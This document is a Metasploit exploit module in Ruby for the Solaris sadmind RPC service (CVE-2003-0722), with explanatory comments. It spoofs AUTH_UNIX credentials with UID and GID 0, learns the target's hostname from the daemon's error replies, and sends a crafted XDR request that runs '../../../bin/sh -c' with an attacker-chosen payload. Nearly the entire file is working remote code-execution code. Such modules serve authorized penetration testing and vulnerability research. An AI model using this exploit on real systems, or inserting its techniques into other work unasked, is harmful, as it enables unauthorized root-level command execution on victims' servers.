##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Exploit module for the Solaris sadmind RPC service (RPC program 100232,
  # version 10, reached over UDP). All RPC traffic goes through the
  # Msf::Exploit::Remote::SunRPC mixin helpers (sunrpc_create, sunrpc_authunix,
  # sunrpc_call, sunrpc_destroy).
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SunRPC

  # Registers module metadata and the HOSTNAME / UID / GID options.
  #
  # HOSTNAME: when unset, +exploit+ first tries to learn the target's own
  #   hostname from the daemon's error reply before sending the payload.
  # UID / GID: the AUTH_UNIX credentials presented to the daemon; both default
  #   to 0.
  #
  # The Notes block declares IOC_IN_LOGS, i.e. the authors expect the
  # interaction to leave traces on the target.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Solaris sadmind Command Execution',
        'Description' => %q{
          This exploit targets a weakness in the default security settings of
          the Sun Solstice AdminSuite distributed system administration daemon
          (sadmind) RPC application. This server is installed and enabled by
          default on most versions of the Solaris operating system.

          Vulnerable systems include Solaris 2.7, 8, and 9.
        },
        'Author' => [
          'vlad902 <vlad902[at]gmail.com>',
          'hdm',
          'cazz',
          'midnitesnake'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2003-0722'],
          ['OSVDB', '4585'],
          ['BID', '8615']
        ],
        'Privileged' => true,
        'Platform' => %w[solaris unix],
        'Arch' => ARCH_CMD,
        'Payload' => {
          'Space' => 2000,
          'BadChars' => "\x00",
          'DisableNops' => true,
          'EncoderType' => Msf::Encoder::Type::CmdPosixPerl,
          'Compat' => {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic perl telnet ksh'
          }
        },
        'Targets' => [ ['Automatic', {}], ],
        'DisclosureDate' => '2003-09-13',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      OptString.new('HOSTNAME', [false, 'Remote hostname', nil]),
      OptInt.new('GID', [false, 'GID to emulate', 0]),
      OptInt.new('UID', [false, 'UID to emulate', 0])
    ])
  end

  # Presence check only: tries to obtain a UDP RPC handle for program 100232
  # version 10. No handle means the service is not reachable (Safe); otherwise
  # the result is Detected, not Vulnerable -- the probe shows that sadmind is
  # listening but does not confirm that its security settings accept the
  # credentials +exploit+ presents.
  #
  # @return [CheckCode]
  def check
    port = sunrpc_create('udp', 100232, 10)
    port.nil? ? CheckCode::Safe : CheckCode::Detected
  ensure
    # Tear the RPC handle down regardless of how the probe ended.
    sunrpc_destroy unless rpcobj.nil?
  end

  # Sends the encoded payload to sadmind as a 'system' class method call.
  #
  # Flow:
  #   1. Create the RPC handle and present AUTH_UNIX credentials for
  #      'localhost' with the configured UID/GID.
  #   2. If HOSTNAME is not set, send a throwaway request with a random
  #      hostname; the daemon's "Security exception on host <name>. USER"
  #      reply is parsed to recover the target's real hostname.
  #   3. Re-authenticate with that hostname and send the payload.
  #   4. Another "Security exception" reply means the daemon rejected the
  #      presented hostname/UID/GID and the run is reported as failed.
  #
  # The security-exception replies in steps 2 and 4 are the daemon's rejection
  # path; they are presumably the source of the IOC_IN_LOGS side effect
  # declared in initialize.
  #
  # @raise via fail_with on no reply, on an unparseable hostname reply, or on
  #   a security exception for the final request
  def exploit
    sunrpc_create('udp', 100232, 10)
    sunrpc_authunix('localhost', datastore['UID'], datastore['GID'], [])

    if !datastore['HOSTNAME']
      print_status('Attempting to determine hostname')
      # Random hostname + harmless 'true' command: the point is only to make
      # the daemon echo back the host it rejected.
      response = sadmind_request(rand_text_alpha(rand(1..10)), 'true')

      # A falsy reply means the daemon did not answer at all.
      unless response
        fail_with(Failure::Unreachable, 'No response')
      end

      # The reply names the host it refused; that is the target's hostname.
      match = /Security exception on host (.*)\. USER/.match(response)
      unless match
        fail_with(Failure::Unknown, 'Unable to determine hostname')
      end

      hostname = match.captures[0]
      print_status("Found hostname: #{hostname}")
    else
      hostname = datastore['HOSTNAME']
    end

    # Re-authenticate with the (discovered or supplied) hostname before the
    # real request.
    sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
    print_status("Sending payload (#{payload.encoded.length} bytes) ...")
    response = sadmind_request(hostname, payload.encoded)

    # The daemon rejected the presented credentials for this hostname.
    if /Security exception on host/.match(response)
      fail_with(Failure::Unknown, "Security exception for hostname '#{hostname}' (UID #{datastore['UID']} and GID #{datastore['GID']}).")
    end

    # Absence of an error reply is the only success signal this module checks.
    print_good('Exploit did not give us an error, this is good.')
    # One-second pause before the handle is destroyed in +ensure+ -- presumably
    # to let the remote command get going; not documented here.
    select(nil, nil, nil, 1)
  ensure
    sunrpc_destroy unless rpcobj.nil?
  end

  # Builds and sends one sadmind request invoking the 'system' class method
  # '../../../bin/sh' with the arguments '-c' and +command+.
  #
  # @param host [String] hostname placed in the request header and in the
  #   ADM_HOST / ADM_CLIENT_HOST arguments
  # @param command [String] the string passed as the 'Y' argument (the shell
  #   command line)
  # @return [String, nil] the third XDR field of the reply, i.e. the daemon's
  #   textual response; callers treat a falsy value as "no response"
  def sadmind_request(host, command)
    # Fixed header: seven zero words, then the sadmind header fields.
    # 0x7f000001 is 127.0.0.1; 100232 / 10 repeat the RPC program and version.
    header = Rex::Encoder::XDR.encode(0) * 7
    header << Rex::Encoder::XDR.encode(
      6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
      4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,
      host, 'system', '../../../bin/sh'
    )

    # Argument list in sadmind's name/type/value layout (see do_string and
    # do_int), terminated by the 'netmgt_endofargs' marker.
    body =
      do_int('ADM_FW_VERSION', 1) +
      do_string('ADM_LANG', 'C') +
      do_string('ADM_REQUESTID', '00009:000000000:0') +
      do_string('ADM_CLASS', 'system') +
      do_string('ADM_CLASS_VERS', '2.1') +
      do_string('ADM_METHOD', '../../../bin/sh') +
      do_string('ADM_HOST', host) +
      do_string('ADM_CLIENT_HOST', host) +
      do_string('ADM_CLIENT_DOMAIN', '') +
      do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') +
      do_int('ADM_FENCE', 0) +
      do_string('X', '-c') +
      do_string('Y', command) +
      Rex::Encoder::XDR.encode('netmgt_endofargs')

    # A length word is inserted between header and body. The 326 offset is
    # taken as-is from the wire format -- presumably the part of the header
    # not counted in that length; TODO confirm against the protocol definition.
    request = header + Rex::Encoder::XDR.encode(header.length + body.length - 326) + body

    # RPC procedure 1; the reply is decoded as two integers followed by a
    # string, and only the string is returned.
    ret = sunrpc_call(1, request)
    return Rex::Encoder::XDR.decode!(ret, Integer, Integer, String)[2]
  end

  # Encodes one string-valued sadmind argument: name, tag 9, a length of
  # str2.length + 1 (presumably counting a trailing NUL), the value, and two
  # zero words. The tag values here and in do_int are copied from the wire
  # format and are not otherwise documented in this file.
  #
  # @param str1 [String] argument name (e.g. 'ADM_HOST')
  # @param str2 [String] argument value
  # @return [String] XDR-encoded bytes
  def do_string(str1, str2)
    Rex::Encoder::XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
  end

  # Encodes one integer-valued sadmind argument: name, tag 3, length 4, the
  # value, and two zero words.
  #
  # @param str [String] argument name (e.g. 'ADM_FENCE')
  # @param int [Integer] argument value
  # @return [String] XDR-encoded bytes
  def do_int(str, int)
    Rex::Encoder::XDR.encode(str, 3, 4, int, 0, 0)
  end
end